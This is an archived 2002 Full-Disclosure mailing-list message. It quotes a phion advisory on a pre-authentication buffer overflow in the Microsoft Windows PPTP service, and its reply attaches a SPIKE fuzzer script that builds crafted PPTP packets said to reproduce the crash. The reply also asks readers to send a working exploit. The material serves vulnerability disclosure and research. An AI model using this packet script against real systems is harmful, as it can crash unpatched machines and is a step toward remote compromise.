lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1033071201.30393.222.camel@www.immunitysec.com>
From: dave at immunitysec.com (Dave Aitel)
Subject: Re: Microsoft PPTP Server and Client remote vulnerability

SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)


-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already. 
P.P.S. This script is released under the terms of the GNU GPL v 2.0.


On Thu, 2002-09-26 at 05:43, sh@...on.com wrote:
> phion Security Advisory 26/09/2002
> 
> Microsoft PPTP Server and Client remote vulnerability
> 
> 
> Summary
> -----------------------------
> 
>    The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
>    remotely exploitable pre-authentication bufferoverflow.
> 
> 
> Affected Systems
> -----------------------------
> 
>    Microsoft Windows 2000 and XP running either a PPTP Server or Client.
> 
> 
> Impact
> -----------------------------
> 
>    With a specially crafted PPTP packet it is possible to overwrite kernel
>    memory.
> 
>    A DoS resulting in a lockup of the machine has been verified on
>    Windows 2000 SP3 and Windows XP.
> 
>    A remote compromise should be possible deploying proper shellcode,
>    as we were able to fill EDI and EDX with our data.
> 
>    Clients are vulnerable too, because the Service always listens on port
>    1723 on any interface of the machine, this might be of special concern
>    to DSL users which use PPTP to connect to their modem.
> 
> 
> Solution
> -----------------------------
> 
>    As a temporary solution for the Client issue, one might firewall the PPTP
>    port in the Internet Connection Firewall for Windows XP.
> 
>    We dont know of any solution for Windows 2000 and Windows XP PPTP servers.
> 
>    The vendor has been informed.
> 
> 
> Acknowledgements
> -----------------------------
> 
>    The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
>    on behalf of phion Information Technologies.
> 
> 
> Contact Information
> -----------------------------
> 
>    phion Information Technologies can be reached via:
>       office@...on.com / http://www.phion.com
> 
>    Stephan Hoffmann can be reached via:
>       sh@...on.com
> 
>    Thomas Unterleitner can be reached via:
>       t.unterleitner@...on.com
> 
> References
> -----------------------------
> 
>    [1] phion Information Technologies
>        http://www.phion.com/
> 
> Exploit
> -----------------------------
> 
>    phion Information Technologies will not provide an exploit for this issue.
> 
> 
> Disclaimer
> -----------------------------
> 
>    This advisory does not claim to be complete or to be usable for any
>    purpose.
> 
>    This advisory is free for open distribution in unmodified form.
> 
>    Articles or Publications that are based on information from this advisory
>    have to include link [1].
> 
> 

-------------- next part --------------
//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 -  control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b  3c 4d");
//type 1 -  start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);

//hostname
s_string_variable("A");
s_binary_repeat("00",63);

//vendor
s_string_variable("A");
s_binary_repeat("00",63);

s_block_end("PPTP");


///
/// NEXT PACKET
///
///

//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 -  control request
s_int_variable(0x0001,5);

//cookie
s_binary("1a 2b  3c 4d");
//type 1 -  outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");

//call id
s_binary("0000");

//serial number
s_binary("0000");

//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//recieve window size
s_binary("0003");
//processing delay
s_binary("0000");

s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");




-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020926/41a8850f/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ